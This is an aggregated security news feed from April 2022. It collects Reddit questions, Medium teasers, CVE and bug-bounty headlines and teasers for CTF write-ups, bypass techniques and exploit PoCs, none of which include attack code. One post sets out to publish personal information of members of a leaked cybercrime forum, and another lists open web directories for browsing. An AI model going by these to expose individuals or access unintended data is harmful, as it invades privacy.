    Password managers like LastPass, Bitwarden, 1Password, etc. encourage the use of 2FA to add additional protection by using an authenticator/YubiKey. I strongly disagree, and I don't know why anyone would use 2FA to access their password managers. I travel around the world very much and frequently, also to very hostile countries in Africa, and have experienced muggings and armed robberies myself. It's not too uncommon to have all your belongings taken. I would recommend 2FA for individual websites, but for a password manager that contains ALL your passwords, including the ones to back up your 2FA, it is just nuts. Example: Imagine you are in Ukraine right now. All your passwords are stored in LastPass and you can only access it through your master password and Google Authenticator. The Russians come and take away everything. You have no phone, no computer, nothing. You manage to escape to Poland. You get hold of new devices and try to log in to LastPass. You can't, because you are missing the 2FA device. Ok, next step. Maybe use the backup codes. Dang, they are stored in LastPass as well. Ok, next try. Maybe ask Google for help to recover your account. They give you instructions and tell you to log in to your Google account or ask to verify your email --> Nope, not possible, because those login details are saved there as well. You see where this is going? Losing your 2FA device is one of the worst things that could happen. It's an endless loop of not being able to log in/reset your devices. Now, even if I have a second phone with the 2FA codes stored in a secure location, that would also be useless if I am traveling on the other side of the world. If anyone has a solution / different approach to this, please enlighten me. submitted by /u/Hallowiegehtseuch [link] [comments]
    How to read pcap file with fields which we only want
    So I have this pcap file with various protocols involved, e.g. udp: 12:47:22.002149 IP 226.180.77.184.2836 > 173.91.91.209.20208: UDP, length 147 and tcp: 12:47:22.000371 IP 149.144.16.81.80 > 173.91.91.2.52260: Flags [.], seq 1400:2800, ack 1, win 2049, options [nop,nop,TS val 869951533 ecr 3357690], length 1400: HTTP. Let's say I need to find out what the minimum and maximum bytes for packets are. Now I need to only extract the length field from those packets. For easy analysis I can write this into text format: tcpdump -n -r file.pcap > file.text. If I need to only take the length field in UDP I can easily cut it like this: cat file.text | grep UDP | cut -f8 -d' ' but this doesn't give valid output for TCP or any other protocol because the format is not the same. How do I read a pcap file in the same format/fields? If I can take all the output in fields, the calculation can be easily done, e.g. | Time | source IP | destination IP | packet length |. Can tcpdump or tshark solve this problem? submitted by /u/lowiqstudent69 [link] [comments]
    Information Security freelance
    My sister is working at a small marketing business that creates video modules for big stores. They hire architects, engineers, etc. They had a recent incident wherein an architect used the company’s intellectual property to gain a client for himself. They fired the employee and filed a legal complaint. The small business wants to hire an IT Security consultant. As per the IT Security assessment, the company only uses Google Drive for storing their data. Any recommendation to prevent IP (Intellectual Property) theft? Do you suggest they subscribe to Google Workspace and configure a DLP solution? submitted by /u/girlQueso01 [link] [comments]

    Cars and cars interiors
    https://tumakina.com/files/ submitted by /u/shaburushaburu [link] [comments]
    Can I post private apis here?
    I have developed a niche hobby of finding private APIs of different web apps by grokking in devtools. It's pretty simple but I find it very satisfying. Is there a dedicated subreddit where people post such stuff? This is the closest one I could find but it is related to open directories, not APIs. In case there isn't a dedicated subreddit, can I post it here instead for people to discuss? submitted by /u/GullibleEngineer4 [link] [comments]

    [Writeup]Hacktoria — Operation Runner
    This is the process my team and I took in solving this CTF! Continue reading on Medium »
    15 best and free computer forensic tools
    In this article, I decided to collect programs that will help you in conducting investigations and will be free at the same time. Continue reading on Medium »
    War in Ukraine / April 12
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Decrypt passwords and improve photo quality
    I wanted to share several tools designed to recover passwords or texts hidden by pixels: Depix (https://github.com/beurtschipper/Depix)… Continue reading on Medium »
    Personal security in Telegram investigations
    Let’s talk about personal security measures when conducting investigations in Telegram. They will be useful to you in other online… Continue reading on Medium »

    Social Hunter
    Crawls the given URL and finds broken social media links that can be hijacked. Broken social links may allow an attacker to conduct… Continue reading on Medium »
    [2/3] XSS Through The Front-Door @ GitLab
    Sometimes XSS flaws are met with shrugs. They’re an incredibly common vulnerability in web applications even today with so many… Continue reading on Medium »

    Citrix SDWAN Hard-Coded Credentials
    submitted by /u/k1dney [link] [comments]
    TallGrass: An AV exclusion enumeration tool written in Python
    submitted by /u/UnwearableCactus [link] [comments]
    Around 50,000 GitHub credentials leaked as metadata inside commits
    submitted by /u/gid0rah [link] [comments]
    OpenSSH 9 released on 2022-04-08. By default it uses NTRU algorithm which is believed to resist attacks enabled by future quantum computers.
    submitted by /u/mstromich [link] [comments]
    A real PoC for CVE-2022-21907 RCE DoS IIS
    submitted by /u/yoursisterboy [link] [comments]

    SecWiki News 2022-04-13 Review
    Reflections and practice on cultivating research-oriented data science talent by ourren. For more of the latest articles, visit SecWiki

    Coercing NTLM Authentication from SCCM
    submitted by /u/dmchell [link] [comments]

    Critical security vulnerability fixed in Elementor (5M+ WordPress Installs)
    Article URL: https://patchstack.com/articles/critical-vulnerability-fixed-in-elementor-plugin/ Comments URL: https://news.ycombinator.com/item?id=31014804 Points: 1 # Comments: 0
    Remote Procedure Call Runtime Remote Code Execution Vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809 Comments URL: https://news.ycombinator.com/item?id=31012416 Points: 4 # Comments: 0
    Microsoft patches zero-day RCE vulnerability with CVE score of 9.8
    Article URL: https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/ Comments URL: https://news.ycombinator.com/item?id=31012226 Points: 1 # Comments: 0
    Git security vulnerability announced
    Article URL: https://github.blog/2022-04-12-git-security-vulnerability-announced/ Comments URL: https://news.ycombinator.com/item?id=31009675 Points: 523 # Comments: 256

    Coercing NTLM Authentication from SCCM
    tl;dr: Disable NTLM for Client Push Installation Continue reading on Posts By SpecterOps Team Members »
    Start learn pentesting/hacking. The Red Team
    Useful materials for those who starting to learn pentesting/hacking. All materials checked by myself. Continue reading on Medium »

    Heap Exploitation for Homo sapiens.
    Arming the Use-After-Free()
    ROP Chains on ARM
    Integer Overflows in ARM
    Invoking mprotect() using ROP Chains in ARM
    500$ Bug: Sensitive Data Exposure to Broken Access Control leads, How I able to take over any…
    P1 Vulnerability: How I chained Logical-Error to Account-Takeover Vulnerability that No-One…
    How hackers impersonate email-id’s : Email Spoofing and Phishing Attacks
    How a YouTube Video lead to pwning a web application via SQL Injection worth $4324 bounty
    Android Pentesting Setup On Macbook M1

    [Security Bulletin] Microsoft's April 2022 Patch Tuesday fixes multiple high-severity vulnerabilities
    Microsoft recently released its April 2022 security patches, fixing 119 vulnerabilities across 53 Microsoft products, including 47 privilege escalation vulnerabilities, 47 remote code execution vulnerabilities, 13 information disclosure vulnerabilities, 9 denial-of-serv...

    EU officials may have been targeted by Israel's Pegasus spyware
    According to a recent Reuters report, senior EU officials have been targeted by the notorious Pegasus spyware.
    FreeBuf Morning Report | Hashnode blogging platform has an LFI vulnerability; new hackers steal $600,000 worth of cryptocurrency
    With help from ESET and Microsoft researchers, Ukrainian officials say they successfully stopped a cyberattack targeting energy facilities.
    LockBit ransomware gang lurked in a US government network for months
    Security researchers found that, before deploying its payload, the LockBit ransomware gang had been hiding in the network of a US regional government agency hit by the ransomware for at least five months.
    HP Teradici PCoIP affected by vulnerability, impacting 15 million endpoints
    Teradici is affected by the recently disclosed OpenSSL certificate parsing vulnerability, which causes an infinite denial-of-service loop.
    Imperva's latest report: consumers increasingly numb to the risk of data breaches
    According to Imperva's latest research, consumer trust in the businesses they deal with is at an all-time low, leading many to "give up" on security.
    A hands-on account of reversing a packet signature
    This article mainly describes the process of locating the signing algorithm and implementing automated signing.
    Dark web marketplace RaidForums taken down
    In the law enforcement operation, the founder and chief administrator of RaidForums, only 21 years old, was also arrested.
    Automated network traffic analysis based on machine learning
    This article focuses on the general problem of automated network traffic analysis, aiming to let researchers devote more effort to optimizing models and features.

    Cos (余弦): Blockchain Dark Forest Selfguard Handbook
    Author: SlowMist security team. Original link: https://mp.weixin.qq.com/s/A2XQEWlH25o8YsWjwCz2HQ Preface: Blockchain is a great invention; it has brought changes to certain relations of production and partly solved the precious problem of "trust". But reality is cruel, and people's understanding of blockchain is full of misconceptions. These misconceptions let bad actors easily exploit the gaps, frequently reaching into people's wallets and causing massive losses of funds. This has long been a dark forest. Based on this, SlowMist Technology...

    JTAG/Chip-Off Resources
    Hi community… I’m wondering if I can make a DIY lab for JTAG/Chip-Off but stuck at what needs to be the minimum items to have to perform JTAG/Chip-Off … JTAG/Chip-Off is quite similar to Hardware Reverse Engineering … so what would be the useful resources to get started with … Any mentioned article or book or tools would do great … Thanks submitted by /u/Aromatic_Ideal_2933 [link] [comments]

    Exposing Personally Identifiable Information Behind A Recently Leaked Russian High-Profile Cybercriminal Forum Community - An Analysis
    I've decided to share some personally identifiable information behind a recently leaked high-profile Russian cybercrime-friendly forum community with the idea to assist everyone in their current and future cyber attack or cyber campaign attribution efforts.Sample personally identifiable information courtesy of a recently leaked high-profile Russian cybercrime-friendly forum community:djamix@
    It's Full of Secrets and User-Generated Sensitive and Classified Information - An Update on Some Current Projects
    It used to be a moment when "rocking the boat" while travelling was a monthly routine and when sticking to the basic methodology that "sharing is caring" and that "if it's going to be massive it better be good" was the everyday mentality for a new generation of baby boomers who would eventually end up inspiring the next generation Y which is by the way a secret that you should be extremely

    Blue team scripts you use on red team engagements?
    I feel like I could do better at reports for clients. Besides shots of hash dumps, cracks, shares, AD trees, etc, I like to run winpeas and screenshot it, but the output is a little long for screenshots. Can anyone recommend any good blue team scripts that offer good output for reports? submitted by /u/hpliferaft [link] [comments]
    Tired of SANS. Any other good training/certification programs?
    I have 7 SANS certs (1 a year) and I get unlimited cloud vendor training/cert attempts from my employer. Any suggestions for non-SANS, and non-Azure/AWS training? submitted by /u/m0lware [link] [comments]
    Are Java updates cumulative from a security standpoint ?
    Hello allo, sysadmin trying to learn some basic security here. Currently I am looking at this CVEdetails page on Java vulns; it mentions Java 8 update 311 is vulnerable to a specific vuln. My question is, would Java 8u301 be vulnerable as well? My understanding is: CVEdetails, various advisories and Oracle themselves never explicitly mention that other v8 updates are affected. But maybe it's because Java updates fundamentally always are backwards-compatible, so it's basically a fundamental given and I missed this info? I know vuln scans exist and Wazuh, Greenbone and OpenCVE all return simply nothing on this software, but we all know vuln scans are not the perfect holy grail either; I'd rather just know how the hell Oracle approaches this. Maybe this better fits r/AskProgramming but since it's more specifically on the security side I start here. Thanks for any answers. submitted by /u/YetAnotherSysadmin58 [link] [comments]
    Open Source tool for code/data leakage
    I'm looking to find open source tools (or low-cost) that can scan common places on the internet where people might upload my company's data accidentally or maliciously. I'm interested in scanning places like github/bitbucket/etc for code, as well as pastebin/other random sites for bulk data. I haven't gotten much farther than google dorks and github searches thus far. Any good tools out there? submitted by /u/tophersmith [link] [comments]
    network forensic analysis challenge
    Hi, I am looking for some network forensic challenges/puzzles, like getting a .pcap file and trying to determine what happened or from which IP and so on. I found netresec.com. Lots of pcaps there, especially about the MACCDC competitions, but it is not clear to me WHAT the "challenge" is, or even if there is one; I mean maybe they provide very realistic pcap files and it is necessary to understand what happened on the wire without any clue at all. Any other suggestion? Thank you! submitted by /u/g-simon [link] [comments]
    IT Consultant to CyberSecurity Field?
    I am an IT management consultant at one of the biggest shops in the world. Think tier 2.. I am currently an entry level MC working as a trainer with a govt focused cloud architecture. I have close to two years of experience in the field and want to know my prospects for transitioning in the Cyber Security Field; and what types of roles are available to someone transitioning from IT Management Consulting? submitted by /u/nyulspboy [link] [comments]
    Can a webpage access any part of an extension from the browser?
    For example, LastPass the browser extension has the user log in with their master password in the extension window, which can have any webpage loaded in the browser at the same time. Is it possible for a malicious webpage to be able to interact with the extension such that it can read what is being input? What ability if any do web pages have to access extensions in the browser? Is it one way? i.e. Extensions can affect a webpage but not the other way around? Or is the extension model included in the DOM items that a webpage can interact with? submitted by /u/JamieOvechkin [link] [comments]
    No prior knowledge. No IT background. About 3 years to learn. Too much to dream?
    So, basically... is it worth pursuing the bug bounty path? I am looking for a side hustle (maybe one day a full job?) and I have around 3 years to spare while maintaining my actual job. Is it feasible? Or would you choose another thing to pursue? *same question asked in the bb subreddit. submitted by /u/_sephi_ [link] [comments]

    Earning $$$ without any hacking, Most interesting OTP Bypass
    Want to see how i managed to get OTP Bypass without any hacking ? Give it a shot and read my story! Continue reading on Medium »
    Earning $$$ without any hacking, Most interesting OTP Bypass
    Want to see how i managed to get OTP Bypass without any hacking ? Give it a shot and read my story! Continue reading on InfoSec Write-ups »
    Compromise domain with NoPac exploit
    During the last pentesting in client infra, we compromised a domain with CVE-2021–42287/CVE-2021–42278(noPac) exploits. Continue reading on Medium »
    Euler launches a $1 million ImmuneFi Bug Bounty program!
    The ImmuneFi Bug Bounty program aims to strengthen Euler's security while deepening collaboration with the broader DeFi ecosystem as part of our… Continue reading on Medium »
    Broken session control leads to access the admin panel even after revoking the access!! — #ZOHO
    Hey Guy’s Continue reading on Medium »
    CVE-2021–4034
    CVE-2021–4034 Local privilege escalation Continue reading on Medium »
    AlbusSec:- Penetration-List 05 Cross-Site-Scripting (XSS) — Part 3
    Hello Medium folk, I hope you enjoyed our previous articles, so now on this article You’ll learn about Types of Cross-Site-Scripting… Continue reading on Medium »
    Nexus Mutual Community Renews Bounty Matching Program With $600k War Chest
    The Nexus Mutual community has just voted to continue its bug bounty matching program with Immunefi and increase the size of the war chest… Continue reading on Immunefi »
    Immunefi Matching Bug Bounty Program: Renewal and Expansion
    Nexus Mutants recently approved the renewal and expansion of the Immunefi matching bug bounty program by a unanimous vote. Funding for the… Continue reading on Nexus Mutual »

    OSINT TOOLS 2022 THE MOST COMPREHENSIVE LIST OF SOURCES FOR THE OSINT SERVICE.
    PROJECT : ADVISOR B&M LLC (NEW PROJECT)! Continue reading on Medium »
    War in Ukraine / April 11
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »

    Tarrask malware uses scheduled tasks for defense evasion - Microsoft Security Blog
    submitted by /u/dmchell [link] [comments]
    Tarrask malware uses scheduled tasks for defense evasion
    submitted by /u/SCI_Rusher [link] [comments]
    Mythic C2 Framework Introduction Video
    Introduction To Mythic C2 - YouTube submitted by /u/luzunov [link] [comments]
    Up to 100k GitHub credentials leaked...
    submitted by /u/dmchell [link] [comments]
    Some insights into offensive security from ex Facebook red teamer
    Recently recorded this podcast with a CTO in cybersecurity (my boss) and a former offensive security engineer at Facebook (currently enterprise architect at ReliaQuest) about red teaming and offensive security. There is some interesting insight into ethical red teaming, internal vs external teams and getting the business on board with the whole process. Give it a listen if you'd like. https://open.spotify.com/episode/1BuzVj8Md3K4O7OAkuHrdM submitted by /u/AgentLessBots [link] [comments]

    CVE-2022-22965 – Spring RCE (which does NOT impact spinnaker)
    Article URL: https://www.armory.io/blog/cve-2022-22965-spring-rce-which-does-not-impact-spinnaker/ Comments URL: https://news.ycombinator.com/item?id=31008467 Points: 2 # Comments: 0
    Git v2.35.2 and below for CVE-2022-24765
    Article URL: https://lore.kernel.org/git/xmqqv8veb5i6.fsf@gitster.g/ Comments URL: https://news.ycombinator.com/item?id=31008416 Points: 4 # Comments: 0

    Russian Malware Targeting Ukrainian Energy Sector
    submitted by /u/entropydaemon5 [link] [comments]
    The Security Risks of Open Source Dependencies and Some npm Flaws That Leverage Them
    submitted by /u/mkatch [link] [comments]
    Round Two: An Updated Universal Deserialisation Gadget for Ruby 2.x-3.x
    submitted by /u/Gallus [link] [comments]
    CVE-2022-25165: Privilege Escalation to SYSTEM in AWS VPN Client
    submitted by /u/rhino_security_labs_ [link] [comments]

    Process Hollowing (Mitre:T1055.012)
    Introduction In July 2011, John Leitch of autosectools.com talked about a technique he called process hollowing in his whitepaper here. Ever since then, many malware The post Process Hollowing (Mitre:T1055.012) appeared first on Hacking Articles.
    Defense Evasion: Process Hollowing (Mitre:T1055.012)
    Introduction In July 2011, John Leitch of autosectools.com talked about a technique he called process hollowing in his whitepaper here. Ever since then, many malware The post Defense Evasion: Process Hollowing (Mitre:T1055.012) appeared first on Hacking Articles.

    Git Security Vulnerability Announced
    Article URL: https://github.blog/2022-04-12-git-security-vulnerability-announced/ Comments URL: https://news.ycombinator.com/item?id=31006060 Points: 34 # Comments: 11

    SecWiki News 2022-04-12 Review
    Blockchain Dark Forest Selfguard Handbook by ourren; Analyzing the Spring Framework RCE from scratch by ourren; OLa: a CS post-exploitation module plugin by ourren; Overview of US cybersecurity awareness education initiatives by ourren; DecoyMini: an intelligent emulation and attack deception tool by ourren; Multi-Level Protection (等保), Classified Protection (分保), Critical Infrastructure Protection (关保) and Cryptographic Evaluation (密评): four lines of defense guarding network information security by ourren. For more of the latest articles, visit SecWiki

    Understanding and Defending Against Reflective Code Loading on macOS
    This blog post will describe the concept of loading executables in-memory on macOS and how to detect it. Continue reading on Medium »
    Home-Grown Red Team: Internal Windows Phishing With Pickl3 And InsideMan
    Let’s assume that you’ve sent your phishing email, found an external RCE exploit that led to internal network access, or whatever method… Continue reading on Medium »
    CrowSec EdTech Write-Up: Poisoning
    In this article, I will demonstrate how to resolve this CTF (Capture the Flag), this challenge is a lab and is available in the CrowSec… Continue reading on Medium »

    I made a subreddit for FTP Open Directories.
    I made one so there wouldn't need to be any FTP sites here. r/OpenFTP submitted by /u/ilikemacsalot [link] [comments]
    Notes, Assignments, Question Papers and Study Materials from VMOU (India) [English + Hindi]
    A lot of Study materials, Question papers, Assignments from VMO University, India. Probably left Open on Purpose for students, thus anyone can access. Majority of the content is in Hindi, as well as English, on multiple Subjects/Fields. http://assets.vmou.ac.in/ submitted by /u/amritajaatak [link] [comments]
    Minecraft Mod OD? (I'm not sure)
    A Minecraft mod, kind of an interesting OD. If anyone wants to try this mod, please say if it's good or not ;) Have fun! https://www.csse.canterbury.ac.nz/greg.ewing/minecraft/mods/SGCraft/doc/Programs/ submitted by /u/Salty_Ad_69 [link] [comments]
    LLOD 04-12-22 (Large List Of Open Directories)
    http://dev.stoneybrooke.com/ https://packages.bic.mni.mcgill.ca/ https://opensource.wandisco.com/ https://www.song.ac.th/song_web58/images/ http://188.165.227.112/ http://www.figuresworld.net/movies_tv/ http://www.cs.cmu.edu/afs/cs/Web/People/libra-demo/ http://www.frontiernet.net/~mardenz/ http://nerfhaven.com/forums/public/style_avatars/ http://tee.tucows.com/ http://tee.linux.tucows.com/ http://www.jeepwrangler.net/ http://ftp.cs.stanford.edu/ http://www.danslagle.com/mac/ http://www.danslagle.com/mac/iMovie/data/ http://www.healthfreedomusa.org/downloads/iMovie.app/ http://www.sfu.ca/~bvaid/ http://test.scripts.psu.edu/users/ http://brbfinanzag.ch/ http://ftpmirror.your.org/ http://ftpmirror.your.org/pub/misc/apple/ https://www.life.illinois.edu/ming/iWeb.app/ http://202.74.40.12/ http://mail.i-sams.com/ Pastebin of both LLODs: https://pastebin.com/QtuNUVry Also don't look at this: http://www.frontiernet.net/~mardenz/Shrek/Shrek.svg submitted by /u/ilikemacsalot [link] [comments]

    Counter XSS with Spring Cloud Gateway
    Prerequisites Continue reading on System Weakness »
    Counter XSS with Spring Cloud Gateway
    Prerequisites Continue reading on Medium »

    ZAP HUNT Remix
    There is a tool I have used happily for a long time: HUNT! Since I also prefer Data Driven Testing as an analysis method, I have been making good use of the HUNT scripts. Along the way I learned about HUNT Remix, an effort to convert the existing script-based approach for ZAP and Burp Suite into an add-on, and I have now switched my own HUNT usage to the add-on form. Today I will briefly explain what HUNT is and then talk about how to install and use the Remix version of the add-on. HUNT+DDT: a tool I introduced once in 2018, built for the material Jason Haddix presented at DEF CON 25.

    A brief look at Windows telemetry: CIT aka Customer Interaction Tracker - a source of forensic data on at least Windows version till 7
    submitted by /u/digicat [link] [comments]
    Cellebrite free alternatives?
    Hi everyone, is there any free (and hopefully open source) alternative to Cellebrite for mobile forensics? submitted by /u/zr0_day [link] [comments]
    A small advice for a first DFIR setup
    I've gotten a lot of questions about my setup for digital forensics and incident response in the last several months, so I decided to start my blog with an article on it. Suggestions and enhancements are always appreciated. https://www.dfirblog.com/yet-another-setup-for-dfir-investigations/ submitted by /u/samaritan_o [link] [comments]
    BSSID and Cell ID values offline database for PA
    Hello, sometimes the online enrichment of BSSIDs and cell IDs from PA (versions 7.49 and 7.54) fails for me. Does anybody have the full DB for doing this offline, to download? Also, does anybody know how to use open databases such as ALEXANDER MYLNIKOV's databases or the RADIOCELLS.ORG ones? Thanks submitted by /u/PaleAbbreviations648 [link] [comments]

    Regular Expression Denial of Service vulnerability
    Reddit disclosed a bug submitted by dingleberryfarts: https://hackerone.com/reports/1538157
    RCE via WikiCloth markdown rendering if the `rubyluabridge` gem is installed
    GitLab disclosed a bug submitted by vakzz: https://hackerone.com/reports/1401444 - Bounty: $3000

    IAM Your Defense Against Cloud Threats: The Latest Unit 42 Cloud Threat Research
    We present research highlights and recommendations for defense against cloud threats from Unit 42’s Cloud Threat Report: IAM the First Line of Defense. The post IAM Your Defense Against Cloud Threats: The Latest Unit 42 Cloud Threat Research appeared first on Unit42.

    FreeBuf Morning Report | Open-source community calls for stronger routing security; Singapore implements a strict cybersecurity licensing regime
    The Federal Communications Commission should consider comprehensive testing and fines to ensure that internet service providers take at least minimal measures to protect the global internet routing system from malicious attacks.
    Mirai malware is actively exploiting the Spring4Shell vulnerability
    Recent research shows that the Mirai malware is exploiting the Spring4Shell vulnerability to infect vulnerable web servers and carry out DDoS (distributed denial-of-service) attacks.
    Fox News exposed 13 million sensitive records online
    The exposed data contained roughly 13 million web content management records that any internet user could access at will.
    US VA increases its cybersecurity budget by over $100 million, with a focus on implementing zero trust
    The VA is requesting an increase of more than $100 million in its cybersecurity budget for fiscal year 2023, with particular attention to implementing zero-trust preventive measures and security architecture.
    Anonymous hacker group breaches the Russian Ministry of Culture and leaks 446 GB of data
    The hacker group Anonymous breached the Russian Ministry of Culture and leaked 446 GB of data originating from the ministry via the DDoSecrets platform.
    FreeBuf Morning Report | Weibo and other platforms announce a crackdown on pandemic-related rumors; open-source platform npm boycotts Russian developers
    Several commercial website platforms issued announcements that they would take strict action against the relevant illegal or rule-violating information and accounts.

    DeFi Hack: Working Through the Levels
    Author: 0x9k. This article is a contributed submission; Seebug Paper looks forward to your contributions, and every accepted submission receives a gift! Submission mailbox: paper@seebug.org. Foreword: DeFi Hack is a wargame abstracted from vulnerabilities that have appeared in real-world DeFi, built to improve learners' skills at discovering and exploiting DeFi smart-contract vulnerabilities [1]. May The Force Be With You. Challenge description: The goal of this level is to, starting from MayTheForceB...

    Deconstructing Programs for Compiler Fuzzing
    Article URL: https://comby.dev/blog/2022/04/11/comby-decomposer-compiler-fuzzing Comments URL: https://news.ycombinator.com/item?id=30998620 Points: 7 # Comments: 0


    [Python]: Add Server-side Request Forgery sinks
    GitHub Security Lab disclosed a bug submitted by someonenobbd: https://hackerone.com/reports/1538144

    Burp Suite functionality... But in a web browser?
    Is this a thing? I can't install things on my work laptop and sometimes I just want to check what HTTPS is doing. submitted by /u/pooshitfartcoomer [link] [comments]
    BurpSuite Vuln Help
    Performed a scan using Burp Suite on an app where I work. Got this and not sure what the actual impact is: External Service Interaction (DNS) alert. PortSwigger documentation doesn't help. submitted by /u/DoctorPaxel [link] [comments]
    Remote pentesting with a team
    What’s the best way to run a remote pentest where we send a host to the client and have multiple people accessing the host? In the past I’ve used VMware shared devices but that is now deprecated. Any thoughts? Thanks! submitted by /u/yeahivapebro [link] [comments]
    What could be the reason why an SSH server would return a high-byte-count packet to a malicious public IP?
    Srcport was 22 and the destport was a high number. But the bytes sent was about 1140 bytes. I have experimented myself before and a failed SSH login normally just records less than 50 bytes. I don't have access to the SSH logs on the server. What kind of attack will make an SSH server reply back with such a big byte size? submitted by /u/Ecstatic_Constant_63 [link] [comments]
    Decrypting (and formatting) an external HDD when you know the password?
    Hey, so I have no idea if I just bricked my HDD. I encrypted it using VeraCrypt and was able to mount it just fine, until one day I accidentally forgot to mount it using VeraCrypt and right-clicked on it instead and selected "format". Ever since, I haven't been able to mount it using VeraCrypt. How might I go about decrypting and/or formatting it? submitted by /u/856850835 [link] [comments]
    Studying for CompTIA Security+
    Hi, Is anyone here who studied for Security+ and used https://globalcerts.training ? This site comes up everywhere on the web as an ad. submitted by /u/Dodge-Sw [link] [comments]
    Successful virtualization on M1 ARM host and cybersec Linux distros?
    Has anyone had recent success running any cybersec Linux distros as VMs on ARM-based macs? If so, which distro and which virtualization software was used? I see Kali being supported and developed, but was wondering if any others work. Thanks. submitted by /u/cho--e [link] [comments]
    suspected dns hijack, how to go about this?
    Not knowledgeable in netsec by any means; I'm studying web dev so I know the basics. I suspect my router's DNS has been hijacked; I think an attacker is serving me a fraudulent google.com. I had a shenanigan that made me suspect this, but would rather not go into details as I'm trying to keep this post simple. I know it is unlikely someone would go out of their way to do this, but I want to make sure. How can I check that my gateway modem's/devices' DNS have not been tampered with? I tried dnsleaktest but just my ISP's nameservers show up. Is it possible that an attacker would be able to prevent the malicious DNS from showing up when doing a test like this? Thanks submitted by /u/Far-Veterinarian9464 [link] [comments]
    Phishing email detection, analysis, and response
    Have to admit phishing email is a top security concern in the company. There are already lots of successful products such as KnowBe4, Cofense, Mimecast, etc. The email vendor has its own phishing tools/solutions, e.g. Office 365 Defender. I am still seeing new products coming up, such as Tessian and Abnormal Security, gaining traction. Are they solving a new problem, or are they still solving the same problem with really brand-new solutions? submitted by /u/Calm_Scene [link] [comments]

    AWS RDS Vulnerability Leads to AWS Internal Service Credentials
    Article URL: https://blog.lightspin.io/aws-rds-critical-security-vulnerability Comments URL: https://news.ycombinator.com/item?id=30996426 Points: 3 # Comments: 0
    Access control vulnerability in EA exposed sensitive personal data
    Article URL: https://portswigger.net/daily-swig/access-control-vulnerability-in-easy-appointments-platform-exposed-sensitive-personal-data Comments URL: https://news.ycombinator.com/item?id=30991997 Points: 1 # Comments: 0

    AWS RDS Vulnerability Leads to AWS Internal Service Credentials
    submitted by /u/freakwin [link] [comments]
    CI/CD Goat - A deliberately vulnerable CI/CD environment (CTF)
    submitted by /u/TupleType1 [link] [comments]
    Semgrep ruleset for C/C++ vulnerability research
    submitted by /u/0xdea [link] [comments]
    Hackers Exploiting Spring4Shell Vulnerability to Deploy Mirai Botnet Malware. This is far from the first time the botnet operators have quickly added newly publicized flaws to their exploit toolset. Last year, multiple botnets were uncovered leveraging Log4Shell to breach susceptible servers.
    submitted by /u/Late_Ice_9288 [link] [comments]

    Pythonic Malware: Evading Detection with Compiled Executables
    Creating Python executables during an offensive security engagement used to be an effective method of evasion. However, this tactic has… Continue reading on InfoSec Write-ups »
    Hacking Instagram Scammers
    No content preview
    SVG SSRFs and saga of bypasses
    Hi all, hope you are keeping well and staying safe. This blog is about my recent experiences with SVG, HTML to PDF SSRF, and bypasses for… Continue reading on InfoSec Write-ups »
    Server-Side Request Forgery (SSRF) Explained
    No content preview
    Complete Guide To Start Bug Bounty In 2022
    No content preview
    TryHackMe: Blaster
    No content preview
    THM: Attacktive Directory
    No content preview

    A Detailed Guide on AMSI Bypass
    Introduction: Windows developed the Antimalware Scan Interface (AMSI) standard that allows a developer to integrate malware defense in his application. AMSI allows an application to… The post A Detailed Guide on AMSI Bypass appeared first on Hacking Articles.

    Untitled
    Hello my friends, how are you? I hope you are well. Continue reading on Medium »
    Euler launches a $1 million ImmuneFi bug bounty program!
    The ImmuneFi Bug Bounty program aims to strengthen the security of Euler while developing cooperation with the wider… Continue reading on Medium »
    Types of Steganography methods that are used for hiding confidential data.
    > Are the images really safe? Continue reading on Medium »
    Spring4Shell
    Spring4Shell and Spring Cloud RCE vulnerability Scanner Continue reading on Medium »
    [1/3] Brute-Force Protection Bypass @ GitLab
    This is the first of three reports describing my findings from a review I did of Gitlab around 6 months ago. I thought I’d start with the… Continue reading on Medium »
    cilocks-android-lockscreen-bypass
    CiLocks — Android LockScreen Bypass Features Continue reading on Medium »
    pyWhat — Identify Anything. Easily Lets You Identify Emails, IP Addresses, And More…
    The easiest way to identify anything pip3 install pywhat && pywhat --help What is this? Continue reading on Medium »
    Lazyrecon — Tool To Automate Your Reconnaissance Process In An Organized Fashion
    Fashion Continue reading on Medium »
    nexfil-osint-tool-for-finding-profiles-by-username
    NExfil is an OSINT tool written in python for finding profiles by username. The provided usernames are checked on over 350 websites within… Continue reading on Medium »

    War in Ukraine / April 10
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Identification of the WEX terrorist
    On November 28, 2019, one of the largest waves of virtual mining in Russia began… Continue reading on Medium »
    Analysis of advertising counters on websites
    Today I will talk about the study of unique advertising identifiers on the site and their applicability for use in OSINT research… Continue reading on Medium »
    Useful Chrome browser extensions
    We automate OSINT research using useful extensions for the Chrome browser. The Wayback Machine extension… Continue reading on Medium »

    SecWiki News 2022-04-11 Review
    A list of software programs and vendors aimed at protecting personal privacy by 雨苁; A checklist of 300+ tips for protecting digital security and privacy in 2022 by 雨苁; SecWiki Weekly (Issue 423) by ourren; CS-Notes by ourren; Exploiting flawed APIs in smart-home platforms and fixing them by ourren; Using communication protocols to monitor C&C servers in reverse by Avenger. For more of the latest articles, visit SecWiki

    Does anyone here have experience with the EnCase CFSR?
    Doing searches I can find a lot on the EnCE but nothing on the CFSR (besides their official material), despite it being their other major cert. Anyone taken this? How does it compare to the EnCE and other similar certs? submitted by /u/Winter-Obligation276 [link] [comments]
    Windows 7 Vulnerable for MS17-010
    Hi there! I am currently working on a project where I am trying to examine and verify network traffic from "EternalBlue SMB Remote Windows Kernel Pool Corruption" from Metasploit, where it is exploiting MS17-010. The problem is that I can't find any Windows 7 that is vulnerable and isn't patched for it yet. Anyone have any tips and ideas? Thanks! submitted by /u/Odylicous [link] [comments]
    Windows Hibernation Files - A Look Back in Time
